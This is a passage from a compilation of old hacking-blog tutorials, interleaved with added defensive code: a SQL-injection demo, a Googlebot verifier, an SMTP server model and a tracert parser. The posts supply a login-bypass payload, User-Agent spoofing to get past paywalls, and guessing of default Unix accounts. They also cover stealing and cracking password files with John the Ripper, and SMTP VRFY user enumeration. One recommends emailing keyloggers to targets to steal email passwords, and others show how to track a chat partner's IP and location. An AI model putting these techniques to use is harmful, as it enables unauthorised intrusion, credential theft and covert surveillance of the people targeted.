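        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(con, username, password):
    """Same check with bound parameters: the input can never change the query."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


PAYLOAD = "' or 1=1 --"   # the password the post tells the reader to submit


if __name__ == "__main__":
    con = make_db()
    # Vulnerable: the quote closes the string, "or 1=1" is always true and
    # "--" comments out the rest, so the first row (admin) comes back.
    print("vulnerable   :", login_vulnerable(con, "hacker", PAYLOAD))
    # Parameterized: the payload is compared as a literal password and fails.
    print("parameterized:", login_parameterized(con, "hacker", PAYLOAD))
    print("real login   :", login_parameterized(con, "alice", "alice-pw"))
```

The concatenated query ends up as "... WHERE username = 'hacker' AND password = '' or 1=1 --'", which is why the post says you land in the first account in the table. With bound parameters the database receives the query shape and the two values separately, so the same string is just a wrong password.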


Backdoor Secret!

Many sites that force users to register or even pay to search and use their content leave a backdoor open for Googlebot, because a prominent presence in Google search is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the world.
How, then, can you disguise yourself as Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

You're done!

You can always change it back again .... I know of only one site that uses your User Agent to determine your eligibility to use its service, and that is the Windows Update site ...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge it into your registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
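The registry change above works only because the site trusts the User-Agent header. The server-side check that closes that hole, as an added example that is not from the original post: Google's documented way of verifying its crawler, which reverse-resolves the client IP, requires the resulting name to belong to googlebot.com or google.com, then forward-resolves that name and requires it to map back to the same IP. The function names, the 203.0.113.x and 198.51.100.x addresses (documentation ranges) and the DNS tables are constructed for the example; the resolver functions are passed in as parameters so the sample runs offline, and the socket-based ones are included for real use.

```python
"""Server-side check that a request claiming to be Googlebot really is.

Added example, not from the original post. A User-Agent string proves
nothing; forward-confirmed reverse DNS does: PTR lookup of the client IP,
the name must end in googlebot.com or google.com, and an A lookup of that
name must return the same IP. Resolvers are injected so the constructed
sample below runs without network access.
"""
import socket

GOOGLE_DOMAINS = ("googlebot.com", "google.com")


def is_verified_googlebot(ip, user_agent, reverse_lookup, forward_lookup):
    """Return True only when the UA claims Googlebot AND DNS confirms it.

    reverse_lookup(ip) -> hostname or None
    forward_lookup(hostname) -> list of IPs (possibly empty)
    """
    if "Googlebot" not in user_agent:
        return False                      # not even claiming to be the crawler
    host = reverse_lookup(ip)
    if not host:
        return False                      # no PTR record: treat as an ordinary client
    host = host.rstrip(".").lower()
    if not any(host == d or host.endswith("." + d) for d in GOOGLE_DOMAINS):
        return False                      # PTR points somewhere else
    return ip in forward_lookup(host)     # forward-confirmed reverse DNS


def system_reverse_lookup(ip):
    """Real resolver: PTR lookup via the OS (network access required)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except socket.herror:
        return None


def system_forward_lookup(host):
    """Real resolver: address lookup via the OS (network access required)."""
    try:
        return [rec[4][0] for rec in socket.getaddrinfo(host, None)]
    except socket.gaierror:
        return []


# Constructed sample DNS data: 203.0.113.10 is a genuine crawler address,
# 198.51.100.7 is a client that merely sends the Googlebot User-Agent.
FAKE_PTR = {"203.0.113.10": "crawl-203-0-113-10.googlebot.com.",
            "198.51.100.7": "vps-7.example.net."}
FAKE_A = {"crawl-203-0-113-10.googlebot.com": ["203.0.113.10"],
          "vps-7.example.net": ["198.51.100.7"]}


def demo_decision(ip, user_agent):
    """Run the check against the constructed DNS tables."""
    return is_verified_googlebot(ip, user_agent,
                                 FAKE_PTR.get, lambda h: FAKE_A.get(h, []))


if __name__ == "__main__":
    ua = "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
    print(demo_decision("203.0.113.10", ua))   # real crawler
    print(demo_decision("198.51.100.7", ua))   # spoofed UA, PTR is not Google
```

The forward lookup is what defeats a spoofed PTR record: anyone who controls the reverse zone for their own address space can make it answer "crawl.googlebot.com", but they cannot make googlebot.com's forward zone point back at their IP.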


Hide your IP using a Proxy Server!

1. Go to http://www.anonymouse.org

2. Type the website address there after choosing the language.
3. Then press Enter.
4. You are now viewing the website anonymously.
5. The website administrator does not know your IP address. He sees an IP address from some other part of the world.

How to Defeat Java Script Protected Sites!

There are many ways to defeat java-script protected websites. Some are very simple, such as hitting [CTL-alt-del] when the password box is displayed, or simply turning off java capability, which will dump you to the default page. You can try manually searching for other directories, by typing the directory name into the url address box of your browser, i.e.: you want access to target.
Try typing target_com/images. (Almost every website has an images directory) This will put you into the images directory, and give a text listing of all the images located there. Often, the titles of the images will give clues to the names of other directories.
i.e.: in www.target.com/images, there is a gif named gamestitle.gif. There is a good chance that there is a 'games' directory on the site, so you would then type www.target.com/games, and if the directory is valid, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of the entire website, showing all the directories, or even mirror a complete server. They are indispensable for finding hidden files and directories. What do you do if you can't get past an opening "Password Required" box? First do a WHOIS lookup for the site. In our example, www.target.com. We find it is hosted by www.host.com at 100.100.100.1.

We then go to 100.100.100.1, start Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (Not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bedtime. Once you have the image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all sub-directories listed. Let's say we find /target/games/zip/zipindex.html. This would be the index page that would have been displayed had you gone through the password procedure, and allowed it to direct you here. By simply typing in the url target_index you will be on the index page and ready to follow the links for downloading.

The danger of ''ctrl + c'' on the web!

Just try this:
1) Copy some text with 'ctrl + c'
2) Click the link: http://www.sourcecodesworld.com/special/clipboard.asp
You will see the copied text on the screen, accessed by this web page. (Check it out!!)

Do not keep sensitive data (such as passwords, credit card numbers, PINs etc.) in the clipboard while surfing the web. It is very easy to extract the text stored in the clipboard to steal your sensitive information.

Be careful ...

To avoid the Clipboard Hack problem, do the following:
1. In Internet Explorer, click Tools -> Internet Options -> Security
2. Press Custom Level.
3. In the security settings, select Disable under "Allow paste operations via script" and click 'OK'. (Now your clipboard contents are safe.)

Remove Saved Usernames and Passwords!

Click Start, Run and type control keymgr.dll
Remove the entries from the list.
Another way to access this dialog is:
Type control userpasswords2 in the RUN box, click Advanced, Manage Passwords
-Or-
From Control Panel, select your User Account, click Manage your network passwords

Introduction to hacking!

Introduction to hacking
--------------------------

This is a short tutorial designed to show you how to get started with
hacking. It is not an in-depth analysis of Unix and I will not show you how
to hack specific systems or give you any specific usernames or passwords.
Anything that you do after reading this file is NOT my responsibility, so
don't expect me to write to you in jail if you get caught. If you are an
advanced hacker, then I suggest you give this a miss as it's designed for
beginners...

Section 1 : What exactly is a hacker then?

Tricky one really. There are hundreds of definitions floating around, but
the basic description of a hacker would be someone who accesses and uses a
computer system in ways which a normal user might not think of. It may be
legal, but chances are that it will be illegal. Also, many hackers might not
consider you to be one of them unless you have the hacker attitude.
Basically what this means is that you have a certain view over the way in
which things should be done. For example, nearly all hackers are anti
authoritarian. Another thing which you really should do is give voluntary
help to other hackers. This may be in the form of debugging programs that
they have written, informing them of new bugs in systems etc... There are
plenty of detailed FAQs out there, so I won't go into it in detail. Try
looking up 'hacker ethics' in any decent search engine (www.altavista.com
is pretty good) for more.

Section 2 : Tell me how to hack!

Yeah right. You ask any hacker or newsgroup this and you're gonna get flamed.
Flaming is when someone responds to your question by throwing a string of
anger and obscenities at you because they are mad. Why do they do this?
After all, hacking is about giving voluntary help, isn't it? Well, asking how
to hack is not only far too general, but it's also pointless. Nobody can
tell you how to hack. They can give you passwords, programs and bugs, but
by doing this they would be stopping you from learning and discovering
new things, and let's face it, the best way to learn to hack is to do it.

Section 3 : Where to learn

Apart from actually hacking, the most important thing you can do is read.
Texts can come from a variety of sources, including your local library and
of course the internet. There are some around with titles like 'The secret
underworld of hacking' but these are mostly a waste of time, and contain no
valuable information. Instead, read books with titles like : 'Unix : An
introduction' or 'How to teach yourself Unix'. These will contain a wealth
of commands and information. You will not learn by simply downloading
programs to do your work for you, although some are essential (I'll tell you
which ones later).

Section 4 : The art of hacking

Hacking is in many ways an art. It takes time, patience and intelligence.
You won't get immediate gratification, but if you do get good, then it's
really worth it. There are several skills associated with hacking, but the
fundamental one, which is often overlooked by newbies, is the ability to
program. Programming is basically telling the computer what to do, and a
programming language is the way in which you write it. Again, there are
millions of tutorials to do with this subject, and it is FAR too big to go
into here. The basic languages you will need to know are perl and c, which
are the main languages for the Unix operating system (I'll go onto that in a
second). Again, any good search engine will give you hundreds of sites
related to these. Just to give you an idea of what programming is about,
here's some c source code (that's the text before it is compiled/interpreted
so the computer can understand it):

#include <iostream>   // declares cout
using namespace std;
int main()
{
    cout << "Hi there, how are you!";   // string literals use double quotes
    return 0;
}

Note that this section of code is taken from a MSDOS application. Unix will
differ slightly. Although it can be a bit tedious, programming is very
rewarding, and is very important if you want to become a good hacker. You
won't need to become some programming genius to hack though, just have a
general idea of the syntax used by the languages. The next important skill
you need to learn is how to use the Unix operating system. This is an
operating system (like windows or DOS) which is specifically designed for
networking. Most big servers use it and it allows thousands of users to
connect to virtual (software) and hardware ports remotely (if the computer
it is operating has them). Like programming, Unix is very complicated and
detailed, so I can only give you an introduction here. The best way to teach
you what Unix is is to give you an example. This example assumes that the
person using it has a shell account (a user name and password so that he can
log in and use the computers), and that the user has windows on their
computer. It is entirely fictional:

(In the run bar)
telnet shinracorperation.com 23
(Telnet starts up, there's a brief pause before the cursor starts flashing)
SunOS : 5.10
login:rudolf
password:########

Welcome to the shinra corperations main server. Type 'help' for more.
$

That is an example of a typical Unix system. To operate it, we run telnet
(the standard telnet program included with windows); this will allow our
computer to communicate with the remote server, which is
shinracorperation.com. The number 23 after it tells telnet to connect to
port 23 on the computer. Ports allow remote users to input commands to the
computer. A computer can have thousands of ports, each with a different
number, but the most common, and what they do, are:

13 : Date and time port (pretty useless really)
21 : FTP (File Transfer Protocol) port
23 : Standard telnet port. This is the port which the telnet program will
try to open by default
25 : Send Mail port. This allows the user to operate an ancient send mail
program which can send messages to email addresses on that server (more
later)
79 : The 'finger' port. This allows the user to type in the name of a user
and get details on them (very useful)
80 : Standard http port (it's the one your browser opens)
110 : POP port. Allows you to operate a primitive POP email program.

To connect to each of these ports you would put the number instead of 23 on
the command line. The next line tells us what type of operating system the
computer is using. This will become important if you need to use a bug or
back door to get into the system, as they vary from operating system to
operating system. One advantage of Unix operating systems is that they don't
record your login attempts, so the sysadmin won't find 6000 attempts in his
log file when he has a look. Now, the only thing holding us back here is the
need for a username and password. In the early days of hacking, you could
telnet to any computer, type in root as your username and root as your
password and you'd be in with superuser privileges (root is the username
that should give you the ability to do anything on that computer). That
ain't gonna happen these days. There are some servers which you might be
lucky enough to guess a username and password on, so have a look at the list
below of common Unix users:

root
admin
adm
sysadmin
guest (VERY often the password will be guest too)
test
demo
uucp

Although unlikely, these may work if you enter the password the same as the
username; it's worth a try. I hope that gave you an idea of what Unix is.
The final part, by the way, was the command prompt, similar to the C:\>
prompt in DOS. Here you would enter commands for the computer. Since this is
only an introduction, I won't go into commands here, but there are plenty of
books, many from your local library, which will tell you how to use Unix. You
can find more information on how to exploit bugs in Unix operating systems
and backdoors in them by using a search engine. Chances are that you will
not be able to guess the password. In this case you'll need to do some
research. Try looking at the company's web site, and finding out things
about them.

Section 5 : Toolz

Although you should use them as little as possible, you will need to use
some programs. One of the most essential is a password cracking program. On
most Unix systems, the password file is located in /etc/passwd. As I've
said, there are plenty of files which will tell you how to download it, so I
won't go into that here. Now, assuming you've got the password file, you'll
need a program called John the Ripper to crack the hashes in the file and
recover the passwords. If you open the passwd file with a standard editor
like notepad or edit, you will see something like:

root:h589798Hhgh:0:0:/etc

or

root:x:0:0:/etc

With many more lines added on. If it looks like the first one, then not only
are you lucky, but you've got the passwords for the entire system. Now run
John the Ripper on it, and if your dictionary file (a file with lots of
standard passwords in it) is good enough, you should at least get a few of
the passwords. If you get root, then get very, very excited. You can now log
into the system and do anything. BUT be warned, you do ANY damage what so
ever, and they'll find you within a couple of hours, so DON'T. Not only
that, but it'll make you a cracker, which is someone who breaks into a system
to do damage to it; they are looked down upon by real hackers. Now, if it
looks more like the second one, get ready to cry 'cos the password file is
shadowed. This means that although the users are stored in the passwd file,
the passwords are stored in a different one, usually /etc/shadow. This
obviously means that you must download the shadow file (the server probably
won't let you), merge it with the passwd file, and then run John the Ripper
on it. If you can get both the passwd and shadow files, you'll need to get a
program called VCU to merge them, although there are some others around.
Shadowing is used by most servers these days, and makes life a hell of a lot
more difficult.

Section 6 : Using programs on the server

The first program I'm gonna look at is SMTP (send mail), which is usually
stored on port 25. I'm not gonna give any direct examples here, but replace
the xxx part with virtually any server name and you should find one:

telnet xxx 25

SMPT Version 1.3 Ready

And that is all you get. You are now ready to run this program. It allows
you to send mail to anyone who has an email address within that server. The
commands that you'll need to know to use this program are:

help - gives you a list of commands. If you follow it with a command, it
will give you help on it

helo - This tells the computer who you are

mail from:xxx - It will say who the mail is from on the message (replace xxx
with a made up or real email address)

rcpt to: - Who the mail will go to. It must be within the server that you
are hacking or you will get the error 'Relaying not allowed'

data : Press enter, and type in what you want the message to say. Put a full
stop (a period) on a separate line and press enter to end and send the
message

quit : Disconnects you

vrfy xxx : Replace the xxx with a user name, and it will tell you if it
exists

This should give you a basic idea of how to use the program. The commands
should come in that order to send mail (vrfy is not needed to send mail; you
can simply use it to tell if a user exists). Oh yeah, and you won't see what
you type in.
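To show what the exchange above looks like from the server's side, here is an added example (not the sendmail program the tutorial refers to): a small server-side state machine for the listed commands, with replies following RFC 5321. It assumes a single local domain, example.test, and gives the two answers a hardened server gives to the two commands this section leans on: 554 'Relaying not allowed' for any recipient outside that domain, and a non-committal 252 to VRFY so that account names are never confirmed or denied.

```python
"""Server-side view of the SMTP dialogue described above.

Added example, not the sendmail program the tutorial refers to. Command
names and reply codes follow RFC 5321; the local domain, greeting text and
transcript are constructed.
"""
from typing import List, Optional

LOCAL_DOMAIN = "example.test"   # assumption: the only domain this host accepts mail for


class SmtpSession:
    """Minimal command state machine; handle() returns the reply for one line."""

    def __init__(self, local_domain: str = LOCAL_DOMAIN):
        self.local_domain = local_domain.lower()
        self.helo: Optional[str] = None
        self.sender: Optional[str] = None
        self.recipients: List[str] = []
        self.in_data = False
        self.body: List[str] = []
        self.delivered: List[dict] = []   # messages accepted for local delivery
        self.closed = False

    def handle(self, line: str) -> Optional[str]:
        """Feed one client line; return the reply, or None for message body lines."""
        if self.in_data:
            return self._data_line(line)
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "HELO":
            self.helo = arg.strip()
            return f"250 {self.local_domain} Hello {self.helo}"
        if cmd == "HELP":
            return "214 Commands: HELO MAIL RCPT DATA QUIT"
        if cmd == "VRFY":
            # Never confirm or deny a user: VRFY is the enumeration step the
            # section describes, and 252 is the RFC-sanctioned way to decline.
            return "252 Cannot VRFY user, but will accept message"
        if cmd == "MAIL":
            if self.helo is None:
                return "503 Send HELO first"
            self.sender = self._address(arg)
            self.recipients = []
            return "250 OK"
        if cmd == "RCPT":
            if self.sender is None:
                return "503 Need MAIL command"
            rcpt = self._address(arg)
            if rcpt.rpartition("@")[2].lower() != self.local_domain:
                # The tutorial's 'Relaying not allowed': an open relay would let
                # any stranger send mail through this host.
                return "554 5.7.1 Relaying not allowed"
            self.recipients.append(rcpt)
            return "250 OK"
        if cmd == "DATA":
            if not self.recipients:
                return "503 Need RCPT command"
            self.in_data = True
            self.body = []
            return "354 End data with <CR><LF>.<CR><LF>"
        if cmd == "QUIT":
            self.closed = True
            return "221 Bye"
        return "500 Command not recognized"

    def _data_line(self, line: str) -> Optional[str]:
        if line.rstrip("\r\n") == ".":          # lone period ends the message
            self.in_data = False
            self.delivered.append({"from": self.sender, "to": list(self.recipients),
                                   "body": "\n".join(self.body)})
            self.sender, self.recipients = None, []
            return "250 OK: queued"
        # Dot-stuffing: a body line starting with '..' carries a literal '.'
        self.body.append(line[1:] if line.startswith("..") else line)
        return None

    @staticmethod
    def _address(arg: str) -> str:
        """Accept 'FROM:<a@b>', 'TO:<a@b>' or 'FROM: a@b'; return the bare address."""
        return arg.split(":", 1)[-1].strip().strip("<>")


def run_transcript(lines: List[str]) -> List[str]:
    """Drive one session with constructed client lines; return the replies."""
    session = SmtpSession()
    return [r for r in (session.handle(l) for l in lines) if r is not None]


if __name__ == "__main__":
    for reply in run_transcript(["HELO client.test", "VRFY root",
                                 "MAIL FROM:<alice@example.test>",
                                 "RCPT TO:<bob@elsewhere.test>", "QUIT"]):
        print(reply)
```

The state checks (503 before HELO or MAIL) mirror the ordering the section says the commands must follow; the relay and VRFY replies are what a client sees when the host is configured the way a defender wants it.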

The other program I'm gonna look at is in port 79 so type:

telnet xxx 79

You will be greeted by, well nothing. Loads of servers have closed this
port, but if they have it open, then it is very useful. All you do is type
in the name of the user you want to finger, and it will give you their
account details. Try all of the common users above. This program will
usually only let you finger one user before disconnecting.

Conclusion

I hope this has been an informative introduction into the world of hacking.
Even at this level, there are tonnes more things which you will need to find
out about so that you can hack. I suggest you look the following things up
in your search engine:

Unix operating system
computer security
hack
c programming
perl programming
hacking tutorials

Hopefully you will find what you need. One last word of warning: be VERY
careful about hacking, and don't do any damage, you WILL get caught if you
do. Oh yeah, and have fun...

Legal Stuff...

You may reproduce this document on any web page or on any CDROM or
otherwise. You do not have to ask my permission or anything, as long as it
remains unchanged and I get the credit. As I've already said, I'm not
responsible if you act on the information above, and this was intended for
EDUCATIONAL PURPOSES ONLY.


A Sure Method of Cracking Any E-mail Password!

One of the most successful methods is achieved with the use of keyloggers and spy software. There are lots of spyware and logging tools available today such as 007, RemoteSpy, Netvizor, Email Spy, Chat Spy, Spector Pro, eBlaster, Invisible Keylogger, to name a few. This software will create a self extracting or installation file; you can then run it on the computer for surveillance, or email it to your target. The only question is, how can you convince the recipient to open it?

Most hackers do not really hack passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers; instead they will go for the easy way - the end user, that's you. It's not what you see in movies such as "Hackers," "SwordFish," and so on. Too good to be true! They don't actually hack, but log every stroke on your keyboard, including the passwords you have input.

Keep in mind that computer surveillance programs should be used only if necessary; they were not created to invade someone's privacy. If you are going to use one, be a responsible user.

Thursday, November 15, 2007

How to Hack (Basic Tips to Start Hacking)!

How to Hack?

What do they do to hack?
These are common enough questions, asked on nearly every hacking board across the web, and yet no one seems to be able to answer them.
One reason for this is the fact that the vast majority of people really don't have, want, or need a clue. Then there's a small minority who have a good basic knowledge but simply not enough conviction to teach. Then there's the tiny minority who really know the ins and outs of computer systems; they can program exploits and bug fixes, and can generally fix, or find out how to fix, nearly any problem. These are the people referred to as computer experts. An even smaller percentage of people again are called hackers. Hacker is a term that over recent time has been changed and exploited by the media to mean someone who breaks into and destroys a computer system. I don't like these people. These are the people who give true hackers a bad name. By dictionary definition, a hacker is someone who has an extraordinary ability to push a computer system, or program, to work beyond expected boundaries: "He hacked away at the program all night until he got it to work". A hacker, in the true meaning, should be respected; the modern interpretation, someone who breaks systems, is traditionally known as a cracker.

The biggest reason for someone to truly want to become a hacker is to learn. There's no bigger reason than this. The simple craving to learn about, change, understand and improve a computer system and/or program is the single biggest goal for any hacker. Maybe the second biggest reason behind hacking is freedom. To understand this you must first understand what I talked about in the previous paragraph, that hacking is not breaking systems, but improving them. Anyone who considers themselves half knowledgeable about the Internet should have heard of GNU/Linux. If you haven't, please refer to http://www.linux.org/info/index.html. Linux and the GNU project embody the spirit of what I consider to be a true hacker goal. The ideas of freedom, improvement and development should be at the heart of every hacker's life. The Internet itself is another representation of this ideal. There is no one owner of the Internet; anyone can access it for no costs other than that of a phone call. The Internet is the single biggest source of information the world has ever seen. It contains information on billions of subjects, the vast majority of which is absolutely free. A person with a connection to the Internet can access information on everything from quantum computing to the exploration of Mars, from pro-anarchy to pro-capitalist. It allows all this information to be accessible to everyone with no discrimination on the basis of age, colour, religious or political orientation. That's enough of a rant on freedom now. I'm sure most people are reading this to find out what it takes to become a hacker.

A hacker, as I have previously explained, is a person who has a craving for knowledge. If you don't have the will to learn continuously, spend countless hours reading, researching and improving, then hacking definitely isn't for you. Many people will give up after a few months; many, I'm sure, didn't even make it this far into the document. If you did, then well done, keep reading; in time, you will learn to truly enjoy hacking away at your own programs and helping others too. I am by no means a hacker; neither do I claim to be. However, I have been reading, learning and sometimes even contributing for quite a while now, and hopefully this document will allow you to do the same. Enough talk. This is where you start to learn.

As by now you will know, the main aim of hacking is knowledge. Before you can even hope to understand how to improve software you must first understand how the current software works. I am assuming that most newbies (newbie n. someone who has little knowledge or experience with computer systems and/or programs) will be using a version of the Windows OS (OS - operating system). Since you wish to learn how to hack I am assuming you have quite a strong grasp of the basics of Windows, such as how to run programs, navigate your hard disk, install new software, hardware etc. If you do not know how to do this, use the built-in help function by clicking Start -> Help, or use your favourite search engine; I suggest google.com as it's probably the largest in the world. Learn how to use everything about your OS, including MS-DOS. To open an MS-DOS prompt, or shell, click on Start -> Programs -> MS-DOS Prompt; if this fails or the link isn't there for some unknown reason, click Start -> Run and then type 'command.com'. This will run the program command.com, which is located in the c:\ directory of your hard disk. There are various programs that can be run from the DOS prompt which are very useful in basic hacking techniques.


Intro to MS-DOS

MS-DOS is a command line OS which is the basis for most Windows OSes. It has many internal commands such as copy, cd, cls, ren, del, and several external commands including sys, move, format, deltree, syscopy. Internal commands are commands which are built into the command.com program and so can be run in any MS-DOS with no dependencies; external commands are commands which are not built into command.com, they are external programs which are usually found in c:\windows\command but can be found anywhere. In DOS, to find out what a command does you can type 'command /?' at a DOS prompt, where command is the name of the command you wish to learn about. This is invaluable, and if you ever need to find out what a command does, this is the first thing you should try. Next I am going to explain some basic MS-DOS commands which will be useful during your exploration of the web.


ping

Usage: ping [-options] hostname.domain

Output:


Pinging yahoo.com [66.218.71.112] with 32 bytes of data:
Reply from 66.218.71.112: bytes=32 time=306ms TTL=45
Reply from 66.218.71.112: bytes=32 time=430ms TTL=45
Reply from 66.218.71.112: bytes=32 time=295ms TTL=45
Reply from 66.218.71.112: bytes=32 time=340ms TTL=45
Ping statistics for 66.218.71.112:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 295ms, Maximum = 430ms, Average = 342ms

Ping sends a ping request to a domain name to test its reactivity and response times. It does this by sending a packet of information to the server in question and requesting a response. The output, as you can see, tells you the domain name that is being pinged, its IP address, the size of the packets sent out, the response times, and averages. Ping is a very useful command as it tells you the IP address of a domain name, and tells you if it is 'alive' and responsive. The uses of this will become apparent later on. To find out extra options that can be used with ping, type 'ping /?' at the DOS prompt.


netstat

Usage: netstat [-options]

Output:


Active Connections
Proto Local Address Foreign Address State
TCP pbn-computer:1067 w3.dcx.yahoo.com:80 ESTABLISHED
TCP pbn-computer:1069 209.73.225.7:80 ESTABLISHED
TCP pbn-computer:1070 212.187.244.14:80 ESTABLISHED
TCP pbn-computer:1071 212.187.244.14:80 ESTABLISHED

Netstat gives a list of all connections coming to and from your computer. It displays the ports (a virtual port of a computer is like an imaginary route for information to come in and out of your computer (to the internet); all services and programs which use the internet use a different port to ensure that information does not get sent to the wrong program) and IPs of both ends of the connections. There are thousands of available ports, not something you run out of. Once again, type 'netstat /?' at the DOS prompt to get more information. Netstat can also be used as a crude method of getting a person's IP. To do this you do the following; for the sake of simplicity you should try to minimise the number of connections, which can be done by closing internet browsers, chat programs etc. Firstly, you will need to talk to the person on a chat program such as MSN Messenger, AIM, Yahoo Messenger or something similar. At the DOS prompt type 'netstat > temp1.txt'; this will give the standard output, but the output will be routed into the file temp1.txt (which, if it does not exist, will be created, and if it does exist, will be overwritten). Next you will need to establish a direct connection with the target computer; this can be done by initiating a file transfer. Whilst the file transfer is taking place you will need to once again type 'netstat > temp2.txt'. The next task is to compare the two files (temp1.txt and temp2.txt); the second file should contain an IP address that is not in the first. This new connection is the connection you initiated to the target computer, hence the IP address is the IP of your target.


tracert

Usage: tracert [-options] IP

Output:


Tracing route to yahoo.com [66.218.71.113]
over a maximum of 30 hops:
1 * * * Request timed out.
2 175 ms 180 ms 180 ms cdf-dam1-a-fa11.inet.ntl.com [62.252.33.201]
3 185 ms 200 ms 200 ms 62.254.253.17
4 180 ms 170 ms 190 ms bir-bb-a-so-220-0.inet.ntl.com [213.105.172.45]
5 165 ms 180 ms 180 ms bir-bb-b-ge-720-0.inet.ntl.com [62.253.185.154]
6 320 ms 360 ms 320 ms yahoo-above-1.pao1.above.net [64.125.31.230]
7 400 ms 340 ms 339 ms ge-1-3-0.msr2.pao.yahoo.com [216.115.100.146]
8 315 ms 355 ms 345 ms vl11.bas2.scd.yahoo.com [66.218.64.138]
9 420 ms 320 ms 340 ms yahoo.com [66.218.71.113]
Trace complete.

Tracert, short for trace route, does exactly that: it traces the route taken by individual packets of information as they are transmitted across the Internet to the destination. The uses of this are numerous and will become clear as you learn more. In its simplest form it can be crudely used to find out a person's ISP and even locate them on an international level. For example, if you tracert a person's IP, and the final hop before reaching them is m284-mp1-cvx1c.car.ntl.com [62.252.45.28], we know that the person uses ntl as an ISP; on further investigation it can be found that ntl is a UK based ISP and the abbreviation .car. stands for Cardiff, a city in the UK. From this we know that the person in question uses ntl and lives in the vicinity of Cardiff. In case anyone out there is wondering, I do live in Cardiff, UK and the IP address is mine; it's a dynamic IP address (dynamic means it changes every time I connect to the internet, as opposed to static, which means the connection is constant and the IP does not change). Use 'tracert /?' for more information.
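The tracert listing above has a regular shape that is worth being able to read programmatically, for instance when comparing traces over time or spotting the hop where latency jumps. As an added example (not part of the original post), here is a parser for that format: it splits each hop into its number, its three round-trip samples and the host and/or IP, and treats a '*' column or a 'Request timed out.' row as missing data rather than a number. The SAMPLE text is constructed in the same style using documentation addresses.

```python
"""Parse Windows tracert output into structured hops.

Added example, not part of the original post. It reads the format shown
above (hop number, three round-trip columns, then a host name and/or IP).
SAMPLE is constructed with documentation addresses; no real hosts appear.
"""
import re
from dataclasses import dataclass
from statistics import mean
from typing import List, Optional

# One hop line: number, exactly three RTT columns ('<1 ms', '180 ms' or '*'), rest.
HOP_RE = re.compile(r"^\s*(?P<hop>\d+)\s+(?P<cols>(?:(?:<?\d+ ms|\*)\s+){3})(?P<rest>.*)$")
RTT_RE = re.compile(r"<?\d+ ms|\*")
# Trailing part: 'host [ip]', '[ip]' or a bare ip; anything else means no answer.
ADDR_RE = re.compile(r"^(?:(?P<host>\S+)\s+)?\[(?P<ip>[\d.]+)\]$|^(?P<bare>[\d.]+)$")


@dataclass
class Hop:
    number: int
    rtts_ms: List[Optional[int]]      # None where that probe got no reply
    host: Optional[str] = None
    ip: Optional[str] = None

    @property
    def timed_out(self) -> bool:
        return all(r is None for r in self.rtts_ms)

    @property
    def avg_ms(self) -> Optional[float]:
        got = [r for r in self.rtts_ms if r is not None]
        return mean(got) if got else None


def parse_tracert(text: str) -> List[Hop]:
    hops: List[Hop] = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue                  # header, footer and blank lines
        rtts = [None if tok == "*" else int(re.sub(r"\D", "", tok))
                for tok in RTT_RE.findall(m.group("cols"))]
        hop = Hop(int(m.group("hop")), rtts)
        a = ADDR_RE.match(m.group("rest").strip())
        if a:
            hop.host = a.group("host")
            hop.ip = a.group("ip") or a.group("bare")
        hops.append(hop)
    return hops


def slowest_hop(hops: List[Hop]) -> Optional[Hop]:
    """Hop with the highest average RTT, ignoring hops that never answered."""
    answered = [h for h in hops if h.avg_ms is not None]
    return max(answered, key=lambda h: h.avg_ms) if answered else None


def destination_reached(hops: List[Hop], target_ip: str) -> bool:
    """True when the last listed hop is the target, i.e. 'Trace complete.'"""
    return bool(hops) and hops[-1].ip == target_ip


# Constructed sample in the tracert style; RFC 5737 documentation addresses.
SAMPLE = """\
Tracing route to example.test [203.0.113.9]
over a maximum of 30 hops:

  1    <1 ms     1 ms    <1 ms  router.home.example [192.0.2.1]
  2     *        *        *     Request timed out.
  3   175 ms   180 ms   180 ms  gw1.isp.example [198.51.100.1]
  4   185 ms   200 ms     *     198.51.100.17
  5   320 ms   360 ms   320 ms  example.test [203.0.113.9]

Trace complete.
"""

if __name__ == "__main__":
    for h in parse_tracert(SAMPLE):
        print(h.number, h.ip or "(no reply)", h.avg_ms)
```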

Ok, so those are three basic, and surprisingly simple yet useful, commands to give you a basic understanding of DOS. If you want to learn more then I suggest you search the internet; http://www.google.com is, as far as I know, the biggest search engine on the web and, along with the most simple of knowledge, should allow you to find anything about anything.

